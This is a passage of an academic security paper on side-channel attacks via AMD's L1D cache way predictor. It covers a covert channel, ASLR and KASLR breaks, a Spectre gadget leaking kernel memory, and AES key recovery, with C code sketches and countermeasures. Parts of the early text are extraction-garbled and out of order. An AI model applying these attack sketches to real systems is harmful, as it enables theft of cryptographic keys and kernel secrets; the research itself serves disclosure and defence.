Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan cache line with address 푣, the attacker observes an L1D cache miss Table 1: Tested CPUs with their microarchitecture (휇-arch.) and loads the data from the L2 cache, resulting in a higher access and whether they have a way predictor (WP). time. 
Otherwise, if the victim has not accessed the cache line with address v, it is still accessible in the L1D cache for the attacker and, thus, a lower access time is measured. By distinguishing between both cases, the attacker can deduce whether the victim has accessed the address v.

Comparison with Flush+Reload. While Flush+Reload invalidates a cache line from the entire cache hierarchy, Load+Reload only evicts the data for the sibling thread from the L1D. Thus, Load+Reload is limited to cross-thread scenarios, while Flush+Reload is applicable to cross-core scenarios too.

Table 1: Tested CPUs with their microarchitecture (μ-arch.) and whether they have a way predictor (WP).

Setup | CPU | μ-arch. | WP
Lab | AMD Athlon 64 X2 3800+ | K8 | ✗
Lab | AMD Turion II Neo N40L | K10 | ✗
Lab | AMD Phenom II X6 1055T | K10 | ✗
Lab | AMD E-450 | Bobcat | ✗
Lab | AMD Athlon 5350 | Jaguar | ✗
Lab | AMD FX-4100 | Bulldozer | ✓
Lab | AMD FX-8350 | Piledriver | ✓
Lab | AMD A10-7870K | Steamroller | ✓
Lab | AMD Ryzen Threadripper 1920X | Zen | ✓
Lab | AMD Ryzen Threadripper 1950X | Zen | ✓
Lab | AMD Ryzen Threadripper 1700X | Zen | ✓
Lab | AMD Ryzen Threadripper 2970WX | Zen+ | ✓
Lab | AMD Ryzen 7 3700X | Zen 2 | ✓
Cloud | AMD EPYC 7401P | Zen | ✓
Cloud | AMD EPYC 7571 | Zen | ✓

5 CASE STUDIES
To demonstrate the impact of the side channel introduced by the μTag, we implement different attack scenarios. In Section 5.1, we implement a covert channel between two processes with a transmission rate of up to 588.9 kB/s, outperforming state-of-the-art covert channels. In Section 5.2, we break kernel ASLR, demonstrate how user-space ASLR can be weakened, and reduce the ASLR entropy of the hypervisor in a virtual-machine setting. In Section 5.3, we use Collide+Probe as a covert channel to extract secret data from the kernel in a Spectre attack. In Section 5.4, we recover secret keys in AES T-table implementations.

Timing Measurement. As explained in Section 2.3, we cannot rely on the rdtsc instruction for high-resolution timestamps on AMD CPUs since the Zen microarchitecture. As we use recent AMD CPUs for our evaluation, we use a counting thread (cf. Section 2.3) running on the sibling logical CPU core for most of our experiments if applicable. In other cases, e.g., a covert channel scenario, the counting thread runs on a different physical CPU core.

Environment. We evaluate our attacks on different environments listed in Table 1, with CPUs from K8 (released 2003) to Zen 2 (released in 2019). We have reverse-engineered 2 unique hash functions, as described in Section 3.
One is the same for all Zen microar- the timing difference of one address, we use two addresses intwo chitectures, and the other is the same for all previous microarchi- cache sets for every bit we transmit: One to represent a 1-bit and tectures with a way predictor. the other to represent the 0-bit. As the L1D has 64 cache sets, we can transmit up to 32 bit in parallel without reusing cache sets. 5.1 Covert Channel A covert channel is a communication channel between two parties Performance Evaluation. We evaluated the transmission and er- that are not allowed to communicate with each other. Such a covert ror rate of our covert channel in a local setting and a cloud set- channel can be established by leveraging a side channel. The 휇Tag ting by sending and receiving a randomly generated data blob. We used by AMD’s L1D way prediction enables a covert channel for achieved a maximum transmission rate of 588.9 kB/s (휎푥¯ = 0.544, two processes accessing addresses with the same 휇Tag. 푛 = 1000) using 80 channels in parallel on the AMD Ryzen Thread- For the most simplistic form of the covert channel, two processes ripper 1920X. On the AMD EPYC 7571 in the Amazon EC2 cloud, we agree on a 휇Tag and a cache set (i.e., the least-significant 12 bits of achieved a maximum transmission rate of 544.0 kB/s (휎푥¯ = 0.548, the virtual addresses are the same). This 휇Tag is used for sending 푛 = 1000) also using 80 channels. In contrast, L1 Prime+Probe and receiving data by inducing and measuring cache misses. achieved a transmission rate of 400 kB/s [59] and Flush+Flush a In the initialization phase, both parties allocate their own page. transmission rate of 496 kB/s [30]. As illustrated in Figure 4, the The sender chooses a virtual address 푣푆 , and the receiver chooses mean transmission rate increases with the number of bits sent in a virtual address 푣푅 that fulfills the aforementioned requirements, parallel. However, the error rate increases drastically when trans- i.e., 푣푆 and 푣푅 are in the same cache set and yield the same 휇Tag. mitting more than 64 bits in parallel, as illustrated in Figure 6. As The 휇Tag can simply be computed using the reverse-engineered the number of available different cache sets for our channel is hash function of Section 3. exhausted for our covert channel, sending more bits in parallel ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al.

[Figure 4 (caption below): mean transmission rate in kB/s plotted against the number of parallel channels, for the AMD Ryzen Threadripper 1920X and the AMD EPYC 7571.]

Table 2: Evaluation of the ASLR experiments.

Target | Entropy | Bits Reduced | Success Rate | Timing Source | Time
Linux Kernel | 9 | 7 | 98.5% | thread | 0.51 ms (σ = 12.12 µs)
User Process | 13 | 13 | 88.9% | thread | 1.94 s (σ = 1.76 s)
Virt. Manager | 28 | 16 | 90.0% | rdtsc | 2.88 s (σ = 3.16 s)
Virt. Module | 18 | 8 | 98.9% | rdtsc | 0.14 s (σ = 1.74 ms)
Mozilla Firefox | 28 | 15 | 98.0% | web worker | 2.33 s (σ = 0.03 s)
Google Chrome | 28 | 15 | 86.1% | web worker | 2.90 s (σ = 0.25 s)
Chrome V8 | 28 | 15 | 100.0% | rdtsc | 1.14 s (σ = 0.03 s)
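The single-bit transmission of the covert channel described in Section 5.1 can be sketched as follows, under the assumption that sender and receiver have already chosen addresses v_s and v_r in the same cache set and with the same μTag (e.g., using the reverse-engineered hash function); the helper names, the rdtscp timer, and the threshold are placeholders, and a counting thread would be used on Zen CPUs in practice.

#include <stdint.h>
#include <x86intrin.h>

#define THRESHOLD 60   /* hypothetical L1-vs-L2 latency bound; calibrate */

static uint64_t timed_load(volatile uint8_t *p) {
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    return __rdtscp(&aux) - t0;
}

/* Receiver: access v_r so the way predictor associates the shared μTag
 * with the receiver's cache line. */
static void receiver_arm(volatile uint8_t *v_r) { (void)*v_r; }

/* Sender: transmit a 1-bit by accessing v_s (same cache set and μTag as
 * v_r), which displaces the receiver's way-predictor entry; transmit a
 * 0-bit by not accessing anything. */
static void sender_send(volatile uint8_t *v_s, int bit) { if (bit) (void)*v_s; }

/* Receiver: a slow access to v_r (served from L2) decodes a 1-bit. */
static int receiver_decode(volatile uint8_t *v_r) {
    return timed_load(v_r) > THRESHOLD;
}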

Figure 4: Mean transmission rate of the covert channels using multiple parallel channels on different CPUs. would reuse already used sets. This increases the chance of wrong mapping functions (Section 3.2) to infer bits of the addresses. We measurements and, thus, the error rate. show an additional attack on heap ASLR in Appendix C. Error Correction. As accesses to unrelated addresses with the same 휇Tag as our covert channel introduce noise in our measurements, 5.2.1 Kernel. On modern Linux systems, the position of the kernel an attacker can use error correction to achieve better transmission. text segment is randomized inside the 1 GB area from 0xffff ffff Using hamming codes [33], we introduce 푛 additional parity bits 8000 0000 - 0xffff ffff c000 0000 [39, 46]. As the kernel image allowing us to detect and correct wrongly measured bits of a packet is mapped using 2 MB pages, it can only be mapped in 512 different with a size of 2푛 − 1 bits. For our covert channel, we implemented locations, resulting in 9 bit of entropy [64]. different Hamming codes 퐻 (푚, 푛) that encode 푛 bits by adding Global variables are stored in the .bss and .data sections of 푚 −푛 parity bits. The receiving end of the covert channel computes the kernel image. Since 2 MB physical pages are used, the 21 lower the parity bits from the received data and compares it with the address bits of a global variable are identical to the lower 21 bits received parity bits. Naturally, they only differ if a transmission of the offset within the the kernel image section. Typically, the error occurred. The erroneous bit position can be computed, and kernel image is public and does not differ among users with the the bit error corrected by flipping the bit. This allows to detect up same . With the knowledge of the 휇Tag from the to 2-bit errors and correct one-bit errors for a single transmission. address of a global variable, one can compute the address bits 21 to We evaluated different hamming codes on an AMD Ryzen Thread- 27 using the hash function of AMD’s L1D cache way predictor. ripper 1920X, as illustrated in Figure 7 in Appendix B. When sending To defeat KASLR using Collide+Probe, the attacker needs to data through 60 parallel channels, the 퐻 (7, 4) code reduces the error know the offset of a global variable within the kernel image thatis accessed by the kernel on a user-triggerable event, e.g., a system rate to 0.14 % (휎푥¯ = 0.08, 푛 = 1000), whereas the 퐻 (15, 11) code call or an interrupt. While not many system calls access global achieves an error rate of 0.16 % (휎푥¯ = 0.08, 푛 = 1000). While the 퐻 (7, 4) code is slightly more robust [33], the 퐻 (15, 11) code achieves variables, we found that the SYS_time system call returns the value a better transmission rate of 452.2 kB/s (휎 = 7.79, 푛 = 1000). of the global second counter obj.xtime_sec. Using Collide+Probe, 푥¯ ′ More robust protocols have been used in cache-based covert the attacker accesses an address 푣 with a specific 휇Tag 휇푣′ and channels in the past [48, 53] to achieve error-free communication. schedules the system call, which accesses the global variable with While these techniques can be applied to our covert channel as well, address 푣 and 휇Tag 휇푣. Upon returning from the kernel, the attacker ′ we leave it up to future work. probes the 휇Tag 휇푣′ using address 푣 . On a conflict, the attacker ′ infers that the address 푣 has the same 휇Tag, i.e., 푡 = 휇푣′ = 휇푣. Limitations. 
As we are not able to observe 휇Tag collisions be- Otherwise, the attacker chooses another address 푣 ′ with a different tween two processes running on sibling threads on one physical 휇Tag 휇푣′ and repeats the process. As the 휇Tag bits 푡0 to 푡7 are known, core, our covert channel is limited to processes running on the same the address bits 푣20 to 푣27 can be computed from address bits 푣12 logical core. to 푣19 based on the way predictor’s hash functions (Section 3.2). Following this approach, we can compute address bits 21 to 27 of 5.2 Breaking ASLR and KASLR the global variable. As we know the offset of the global variable To exploit a memory corruption vulnerability, an attacker often inside the kernel image, we can also recover the start address of the requires knowledge of the location of specific data in memory. kernel image mapping, leaving only bits 28 and 29 unknown. As With address space layout randomization (ASLR), a basic memory the kernel is only randomized once per boot, the reduction to only protection mechanism has been developed that randomizes the 4 address possibilities gives an attacker a significant advantage. locations of memory sections to impede the exploitation of these For the evaluation, we tested 10 different randomization offsets bugs. ASLR is not only applied to user-space applications but also on a Linux 4.15.0-58 kernel with an AMD Ryzen Threadripper 1920X implemented in the kernel (KASLR), randomizing the offsets of processor. We ran our experiment 1000 times for each randomiza- code, data, and modules on every boot. tion offset. With a success rate of 98.5 %, we were able to reduce the In this section, we exploit the relation between virtual addresses entropy of KASLR on average in 0.51 ms (휎 = 12.12 µs, 푛 = 10 000). and 휇Tags to reduce the entropy of ASLR in different scenarios. While there are several microarchitectural KASLR breaks, this With Collide+Probe, we can determine the 휇Tags accessed by the is to the best of our knowledge the first which reportedly works victim, e.g., the kernel or the browser, and use the reverse-engineered on AMD and not only on Intel CPUs. Hund et al. [35] measured Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan differences in the runtime of page faults when repeatedly access- is located. As the equation system is very small, an attacker can ing either valid or invalid kernel addresses on Intel CPUs. Bar- trivially solve it in JavaScript. resi et al. [11] exploited page deduplication to break ASLR: a copy- However, to distinguish between colliding and non-colliding ad- on-write pagefault only occurs for the page with the correctly dresses, we require a high-precision timer in JavaScript. While guessed address. Gruss et al. [28] exploited runtime differences in the performance.now() function only returns rounded results the prefetch instruction on Intel CPUs to detect mapped kernel for security reasons [9, 14], we leverage an alternative timing pages. Jang et al. [39] showed that the difference in access time to source [24, 68]. For our evaluation, we used the technique of a count- valid and invalid kernel addresses can be measured when suppress- ing thread constantly incrementing a shared variable [24, 48, 68, 79]. ing exceptions with Intel TSX. Evtyushkin et al. 
[21] exploited the We tested our proof-of-concept in both the Chrome 76.0.3809 branch-target buffer on Intel CPUs to gain information on mapped and Firefox 68.0.2 web browsers as well as the Chrome V8 stan- pages. Schwarz et al. [64] showed that the store-to-load forwarding dalone engine. In Firefox, we are able to reduce the entropy by logic on Intel CPUs is missing a permission check which allows 15 bits with a success rate of 98 % and an average run time of 2.33 s to detect whether any virtual address is valid. Canella et al. [15] (휎 = 0.03 s, 푛 = 1000). With Chrome, we can correctly reduce the exploited that recent stores can be leaked from the store buffer on bits with a success rate of 86.1 % and an average run time of 2.90 s vulnerable Intel CPUs, allowing to detect valid kernel addresses. (휎 = 0.25 s, 푛 = 1000). As the JavaScript standard does not provide any functionality to retrieve the addresses used by variables, we 5.2.2 Hypervisor. The Kernel-based Virtual Machine (KVM) is a extended the capabilities of the Chrome V8 engine to verify our re- virtualization module that allows the Linux kernel to act as a hyper- sults. We introduced several custom JavaScript functions, including visor to run multiple, isolated environments in parallel called virtual one that returned the virtual address of an array. This provided us machines or guests. Virtual machines can communicate with the with the ground truth to verify that our proof-of-concept recovered hypervisor using hypercalls with the privileged vmcall instruction. the address bits correctly. Inside the extended Chrome V8 engine, In the past, collisions in the branch target buffer (BTB) have been we were able to recover the address bits with a success rate of 100 % used to break hypervisor ASLR [21, 77]. and an average run time of 1.14 s (휎 = 0.03 s, 푛 = 1000). In this scenario, we leak the base address of the KVM kernel module from a guest virtual machine. We issue hypercalls with 5.3 Leaking Kernel Memory invalid call numbers and monitor, which 휇Tags have been accessed In this section, we combine Spectre with Collide+Probe to leak using Collide+Probe. In our evaluation, we identified two cache sets kernel memory without the requirement of shared memory. While enabling us to weaken ASLR of the kvm and the kvm_amd module some Spectre-type attacks use AVX [69] or port contention [13], with a success rate of 98.8 % and an average runtime of 0.14 s (휎 = most attacks use the cache as a covert channel to encode secrets [16, 1.74 ms, 푛 = 1000). We verified our results by comparing the leaked 41]. During transient execution, the kernel caches a user-space ad- address bits with the symbol table (/proc/kallsyms). dress based on a secret. By monitoring the presence of said address Another target is the user-space virtualization manager, e.g., in the cache, the attacker can deduce the leaked value. QEMU. Guest operating systems can interact with virtualization As AMD CPU’s are not vulnerable to Meltdown [49], stronger managers through various methods, e.g., the out instruction. Like- kernel isolation [27] is not enforced on modern operating systems, wise to the previously described hypercall method, a guest virtual leaving the kernel mapped in user space. However, with SMAP machine can use this method to trigger the managing user pro- enabled, the processor never loads an address into the cache if the cess to interact with the guest memory from its own address space. 
translation triggers a SMAP violation, i.e., the kernel tries to access By using Collide+Probe in this scenario, we were able to reduce a user-space address [6]. Thus, an attacker has to find a vulnerable the ASLR entropy by 16 bits with a success rate of 90.0 % with an indirect branch that can access user-space memory. We lift this average run time of 2.88 s (휎 = 3.16 s, 푛 = 1000). restriction by using Collide+Probe as a cache-based covert channel to infer secret values accessed by the kernel. With Collide+Probe, 5.2.3 JavaScript. In this section, we show that Collide+Probe is we can observe 휇Tag collisions based on the secret value that is not only restricted to native environments. We use Collide+Probe leaked and, thus, remove the requirement of shared memory, i.e., to break ASLR from JavaScript within Chrome and Firefox. As the user memory that is directly accessible to the kernel. JavaScript standard does not define a way to retrieve any address in- To evaluate Collide+Probe as a covert channel for a Spectre- formation, side channels in browsers have been used in the past [57], type attack, we implement a custom kernel module containing a also to break ASLR, simplifying browser exploitation [24, 64]. Spectre-PHT gadget as illustrated as follows: The idea of our ASLR break is similar to the approach of reverse- 1 if (index< bounds){a= LUT[data[index] 4096]; } engineering the way predictor’s mapping function, as described * in Section 3.2. First, we allocate a large chunk of memory as a The execution of the presented code snippet can be triggered JavaScript typed array. If the requested array length is big enough, with an ioctl command that allows the user to control the in- the execution engine allocates it using mmap, placing the array at dex variable as it is passed as an argument. First, we mistrain the the beginning of a memory page [29, 68]. This allows using the by repeatedly providing an index that is in bounds, indices within the array as virtual addresses with an additional letting the processor follow the branch to access a fixed kernel- constant offset. By accessing pairs of addresses, we canfind 휇Tag memory location. Then, we access an address that collides with the collisions allowing us to build an equation system where the only kernel address accessed based on a possible byte-value located at unknown bits are the bits of the address where the start of the array data[index]. By providing an out-of-bounds index, the processor ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al.

We successfully leaked a secret string using Collide+Probe as a covert channel on an AMD Ryzen Threadripper 1920X. With our unoptimized version, we are able to leak the secret with a success rate of 99.5 % (σ_x̄ = 0.19, n = 100) and a leakage rate of 0.66 B/s (σ_x̄ = 0.00043, n = 100). While we leak full byte values in our proof-of-concept, other gadgets could allow leaking the secret bit-wise, significantly reducing the overhead of measuring every possible byte value. In addition, the parameters for the number of mistrainings or the necessary repetitions of the attack to leak a byte can be further tweaked to match the processor under attack.

To utilize this side channel, the attacker requires knowledge of the address of the kernel memory that is accessed by the gadget. Thus, on systems with active kernel ASLR, the attacker first needs to defeat it. However, as described in Section 5.2, the attacker can use Collide+Probe to derandomize the kernel as well.

5.4 Attacking AES T-Tables

In this section, we show an attack on an AES [19] T-table implementation. While cache attacks have already been demonstrated against T-table implementations [30, 31, 48, 58, 71] and appropriate countermeasures, e.g., bit-sliced implementations [43, 62], have been presented, they serve as a good example to demonstrate the applicability of the side channel and allow comparing it against other existing cache side channels. Furthermore, AES T-tables are still sometimes used in practice. While some implementations fall back to T-table implementations [20] if the AES-NI instruction extension [32] is not available, others only offer T-table-based implementations [45, 55]. For evaluation purposes, we used the T-table implementation of OpenSSL version 1.1.1c.

In this implementation, the SubBytes, ShiftRows, and MixColumns steps of the AES round transformation are replaced by look-ups to 4 pre-computed T-tables T0, ..., T3. As the MixColumns operation is omitted in the last round, an additional T-table T4 is necessary. Each table contains 256 4-byte words, requiring 1 kB of memory.

In our proof-of-concept, we mount the first-round attack by Osvik et al. [58]. Let k_i denote the initial key bytes, p_i the plaintext bytes, and x_i = p_i ⊕ k_i for i = 0, ..., 15 the initial state of AES. The initial state bytes are used to select elements of the pre-computed T-tables for the following round. An attacker who controls the plaintext byte p_i and monitors which entries of the T-table are accessed can deduce the key byte k_i = s_i ⊕ p_i. However, with a cache-line size of 64 B, it is only possible to derive the upper 4 bits of k_i if the T-tables are properly aligned in memory. With second-round and last-round attacks [58, 72] or disaligned T-tables [71], the key space can be reduced further.
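To illustrate how these measurements can be organized with Collide+Probe, consider the following C sketch. The helpers ttable_line_alias(), collide_probe(), and victim_encrypt() are hypothetical, the mapping of state byte i to one of the four T-tables depends on the concrete implementation, and the sample count is arbitrary; the sketch only shows that, with p_i fixed to zero, the most frequently colliding cache line directly reveals the upper nibble of k_i.

#include <stdint.h>
#include <stdlib.h>

/* Hypothetical helpers: ttable_line_alias() returns a user-space address
 * whose µTag collides with cache line `line` (0..15) of T-table `table` in
 * the victim's address space, collide_probe() is the measurement primitive
 * sketched in Section 5.2, and victim_encrypt() triggers one encryption. */
extern volatile uint8_t *ttable_line_alias(int table, int line);
extern int collide_probe(volatile uint8_t *addr, void (*trigger)(void));
extern void victim_encrypt(const uint8_t pt[16]);

#define SAMPLES 4096

static uint8_t plaintext[16];
static void trigger_encryption(void) { victim_encrypt(plaintext); }

/* Recover the upper nibble of key byte k_i: with p_i = 0, the T-table cache
 * line accessed in the first round is x_i >> 4 = (p_i ^ k_i) >> 4 = k_i >> 4. */
int recover_upper_nibble(int i)
{
    int hits[16] = { 0 };
    int table = i % 4;   /* which T-table byte i indexes; implementation-dependent */

    for (int s = 0; s < SAMPLES; s++) {
        for (int j = 0; j < 16; j++)
            plaintext[j] = (uint8_t)rand();    /* random plaintext ... */
        plaintext[i] = 0;                      /* ... with p_i chosen as 0 */
        for (int line = 0; line < 16; line++)
            hits[line] += collide_probe(ttable_line_alias(table, line),
                                        trigger_encryption);
    }

    int best = 0;          /* the most frequently hit line equals k_i >> 4 */
    for (int line = 1; line < 16; line++)
        if (hits[line] > hits[best])
            best = line;
    return best;
}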
Figure 5 shows the results of a Collide+Probe and a Load+Reload attack on the AMD Ryzen Threadripper 1920X on the first key byte. As the first key byte is set to zero, the diagonal shows a higher number of cache hits than the other parts of the table. We repeated every experiment 1000 times. With Collide+Probe, we can successfully recover the upper 4 bits of each k_i with a probability of 100 % (σ_x̄ = 0), using 168 867 (σ_x̄ = 719) encryptions per byte in 0.07 s (σ_x̄ = 0.0003). With Load+Reload, we require 367 731 (σ_x̄ = 82 388) encryptions and an average runtime of 0.53 s (σ_x̄ = 0.11) to recover 99.0 % (σ_x̄ = 0.0058) of the key bits. Using Prime+Probe on the L1 cache, we can successfully recover 99.7 % (σ_x̄ = 0.01) of the key bits with 450 406 encryptions (σ_x̄ = 1129) in 1.23 s (σ_x̄ = 0.003).

[Figure 5: Cache access pattern with Collide+Probe (a) and Load+Reload (b) on the first key byte; each heatmap plots the probed T-table cache-line address against the byte value (0x00–0xf0).]

6 DISCUSSION

While the official documentation of the way prediction feature does not explain how it interacts with other processor features, we discuss the interactions with instruction caches, transient execution, and hypervisors.

Instruction Caches. The patent [22] describes that AMD's way predictor can be used for both the data and the instruction cache. However, AMD only documents a way predictor for the L1D cache [5] and not for the L1I cache.

Transient Execution. Speculative execution is a crucial optimization in modern processors. When the CPU encounters a branch, instead of waiting for the branch condition, the CPU guesses the outcome and continues the execution in a transient state. If the speculation was correct, the executed instructions are committed. Otherwise, they are discarded. Similarly, CPUs employ out-of-order execution to transiently execute instructions ahead of time as soon as their dependencies are fulfilled. On an exception, the transiently executed instructions following the exception are simply discarded, but they leave traces in the microarchitectural state [16]. We investigated the possibility that AMD Zen processors use the data from the predicted way without waiting for the physical tag returned by the TLB. However, we were not able to produce any such results.

Hypervisor. AMD does not document any interactions of the way predictor with virtualization. As we have shown in our experiments (cf. Section 5.2), the way predictor does not distinguish between virtual machines and hypervisors. The way predictor uses the virtual address without any tagging, regardless of whether it is a guest or host virtual address.

7 COUNTERMEASURES

In this section, we discuss mitigations to the presented attacks on AMD's way predictor. We first discuss hardware-only mitigations, followed by mitigations requiring hardware and software changes, as well as a software-only solution.

Temporarily Disable Way Predictor. One solution lies in designing the processor in a way that allows temporarily disabling the way predictor. Alves et al. [10] evaluated the performance penalty of instruction replays caused by mispredictions. By dynamically disabling way prediction, they observe a higher performance than with standard way prediction. Dynamically disabling way prediction can also be used to prevent attacks by disabling it if too many mispredictions within a defined time window are detected. If an adversary tries to exploit the way predictor or if the current legitimate workload provokes too many conflicts, the processor deactivates the way predictor and falls back to comparing the tags from all ways. However, it is unknown whether AMD processors support this in hardware, and there is no documented operating system interface to it.

Keyed Hash Function. The currently used mapping functions (Section 3) rely solely on bits of the virtual address. This allows an attacker to reverse-engineer the used function once and easily find colliding virtual addresses resulting in the same µTag. By keying the mapping function with an additional process- or context-dependent secret input, a reverse-engineered hash function is only valid for the attacker process. ScatterCache [76] and CEASER-S [61] are novel cache designs preventing cache attacks by introducing a similar keyed mapping function for skewed-associative caches. Hence, we expect that such methods are also effective when used for the way predictor. Moreover, the key can be updated regularly, e.g., when returning from the kernel, and, thus, does not remain the same over the execution time of the program.

State Flushing. With Collide+Probe, an attacker cannot monitor memory accesses of a victim running on a sibling thread. However, µTag collisions can still be observed after context switches or transitions between kernel and user mode. To mitigate Collide+Probe, the state of the way predictor can be cleared when switching to another user-space application or returning from the kernel. Every subsequent memory access yields a misprediction and is thus served from the L2 data cache. This yields the same result as invalidating the L1 data cache, which is currently a required mitigation technique against Foreshadow [73] and MDS attacks [15, 67, 74]. However, we expect it to be more power-efficient than flushing the L1D. To mitigate Spectre attacks [41, 44, 51], it is already necessary to invalidate branch predictors upon context switches [16]. As invalidating predictors and the L1D cache on Intel has been implemented through CPU microcode updates, introducing an MSR to invalidate the way predictor might be possible on AMD as well.

Uniformly-distributed Collisions. While the previously described countermeasures rely on either microcode updates or hardware modifications, we also propose an entirely software-based mitigation. Our attack on an optimized AES T-table implementation in Section 5.4 relies on the fact that an attacker can observe the key-dependent look-ups to the T-tables. We propose to map such secret data n times, such that the data is accessible via n different virtual addresses, which all have a different µTag. When accessing the data, a random address is chosen out of the n possible addresses. The attacker cannot learn which T-table entry has been accessed by monitoring the accessed µTags, as a uniform distribution over all possibilities will be observed. This technique is not restricted to T-table implementations but can be applied to virtually any secret-dependent memory access within an application. With dynamic software diversity [18], diversified replicas of program parts are generated automatically to thwart cache side-channel attacks.
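A minimal sketch of how such aliases could be set up on Linux is shown below, assuming the secret-dependent tables fit into a single page. The use of memfd_create and mmap is only one possible mechanism and the names are ours; in addition, the aliases have to be checked, or chosen, such that they map to different µTags using the hash function from Section 3, and the per-access selection should use a secure randomness source rather than rand().

#define _GNU_SOURCE
#include <stdint.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>

#define N_ALIASES  8
#define TABLE_SIZE 4096            /* e.g., the four 1 kB AES T-tables */

static uint8_t *alias[N_ALIASES];

/* Map the same physical table pages at N_ALIASES different virtual
 * addresses. For the mitigation to be effective, the aliases must resolve
 * to different µTags (check omitted here). */
static int setup_aliases(const uint8_t *tables)
{
    int fd = memfd_create("tables", 0);
    if (fd < 0 || ftruncate(fd, TABLE_SIZE) < 0)
        return -1;
    if (write(fd, tables, TABLE_SIZE) != TABLE_SIZE)
        return -1;

    for (int i = 0; i < N_ALIASES; i++) {
        alias[i] = mmap(NULL, TABLE_SIZE, PROT_READ, MAP_SHARED, fd, 0);
        if (alias[i] == MAP_FAILED)
            return -1;
    }
    return 0;
}

/* Secret-dependent look-up: pick one alias at random so that the observable
 * µTag is uniformly distributed and independent of the accessed index. */
static inline uint32_t table_lookup(size_t index)
{
    const uint32_t *t = (const uint32_t *)alias[rand() % N_ALIASES];
    return t[index];
}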
8 CONCLUSION

The key takeaway of this paper is that AMD's cache way predictors leak secret information. To understand the implementation details, we reverse-engineered AMD's L1D cache way predictor, leading to two novel side-channel attack techniques. First, Collide+Probe allows monitoring memory accesses on the current logical core without the knowledge of physical addresses or shared memory. Second, Load+Reload obtains accurate memory-access traces of applications co-located on the same physical core.

We evaluated our new attack techniques in different scenarios. We established a high-speed covert channel and utilized it in a Spectre attack to leak secret data from the kernel. Furthermore, we reduced the entropy of different ASLR implementations from native code and sandboxed JavaScript. Finally, we recovered a key from a vulnerable AES implementation.

Our attacks demonstrate that AMD's design is vulnerable to side-channel attacks. However, we propose countermeasures in software and hardware, allowing to secure existing implementations and future designs of way predictors.

ACKNOWLEDGMENTS

We thank our anonymous reviewers for their comments and suggestions that helped improve the paper. The project was supported by the Austrian Research Promotion Agency (FFG) via the K-project DeSSnet, which is funded in the context of COMET - Competence Centers for Excellent Technologies by BMVIT, BMWFW, Styria, and Carinthia. It was also supported by the European Research Council (ERC) under the European Union's Horizon 2020 research and innovation programme (grant agreement No 681402). This work also benefited from the support of the project ANR-19-CE39-0007 MIAOUS of the French National Research Agency (ANR). Additional funding was provided by generous gifts from Intel. Any opinions, findings, and conclusions or recommendations expressed in this paper are those of the authors and do not necessarily reflect the views of the funding parties.

REFERENCES

[1] Andreas Abel and Jan Reineke. 2013. Measurement-based Modeling of the Cache Replacement Policy. In Real-Time and Embedded Technology and Applications Symposium (RTAS).
[2] Advanced Micro Devices Inc. 2013. BIOS and Kernel Developer's Guide (BKDG) for AMD Family 15h Models 00h-0Fh Processors.
[3] Advanced Micro Devices Inc. 2014. Software Optimization Guide for AMD Family 15h Processors.
[4] Advanced Micro Devices Inc. 2017. AMD64 Architecture Programmer's Manual.
[5] Advanced Micro Devices Inc. 2017. Software Optimization Guide for AMD Family 17h Processors.

[6] Advanced Micro Devices Inc. 2018. Software Techniques for Managing Speculation on AMD Processors. Revision 7.10.18.
[7] Advanced Micro Devices Inc. 2019. 2nd Gen AMD EPYC Processors Set New Standard for the Modern Datacenter with Record-Breaking Performance and Significant TCO Savings.
[8] Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida García, and Nicola Tuveri. 2018. Port Contention for Fun and Profit. In S&P.
[9] Alex Christensen. 2015. Reduce resolution of performance.now. https://bugs.webkit.org/show_bug.cgi?id=146531
[10] Ricardo Alves, Stefanos Kaxiras, and David Black-Schaffer. 2018. Dynamically disabling way-prediction to reduce instruction replay. In International Conference on Computer Design (ICCD).
[11] Antonio Barresi, Kaveh Razavi, Mathias Payer, and Thomas R. Gross. 2015. CAIN: Silently Breaking ASLR in the Cloud. In WOOT.
[12] Daniel J. Bernstein. 2005. Cache-Timing Attacks on AES. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf
[13] Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandtner, Alessandro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus. 2019. SMoTherSpectre: exploiting speculative execution through port contention. In CCS.
[14] Boris Zbarsky. 2015. Reduce resolution of performance.now. https://hg.mozilla.org/integration/mozilla-inbound/rev/48ae8b5e62ab
[15] Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Marina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo Van Bulck, and Yuval Yarom. 2019. Fallout: Leaking Data on Meltdown-resistant CPUs. In CCS.
[16] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, and Daniel Gruss. 2019. A Systematic Evaluation of Transient Execution Attacks and Defenses. In USENIX Security Symposium. Extended classification tree and PoCs at https://transient.fail/.
[17] Mike Clark. 2016. A new x86 core architecture for the next generation of computing. In IEEE Hot Chips Symposium (HCS).
[18] Stephen Crane, Andrei Homescu, Stefan Brunthaler, Per Larsen, and Michael Franz. 2015. Thwarting Cache Side-Channel Attacks Through Dynamic Software Diversity. In NDSS.
[19] Joan Daemen and Vincent Rijmen. 2013. The design of Rijndael: AES – the advanced encryption standard.
[20] Helder Eijs. 2018. PyCryptodome: A self-contained cryptographic library for Python. https://www.pycryptodome.org
[21] Dmitry Evtyushkin, Dmitry Ponomarev, and Nael Abu-Ghazaleh. 2016. Jump over ASLR: Attacking branch predictors to bypass ASLR. In MICRO.
[22] W. Shen Gene and S. Craig Nelson. 2006. MicroTLB and micro tag for reducing power in a processor. US Patent 7,117,290 B2.
[23] Ben Gras, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2018. Translation Leak-aside Buffer: Defeating Cache Side-channel Protections with TLB Attacks. In USENIX Security Symposium.
[24] Ben Gras, Kaveh Razavi, Erik Bosman, Herbert Bos, and Cristiano Giuffrida. 2017. ASLR on the Line: Practical Cache Attacks on the MMU. In NDSS.
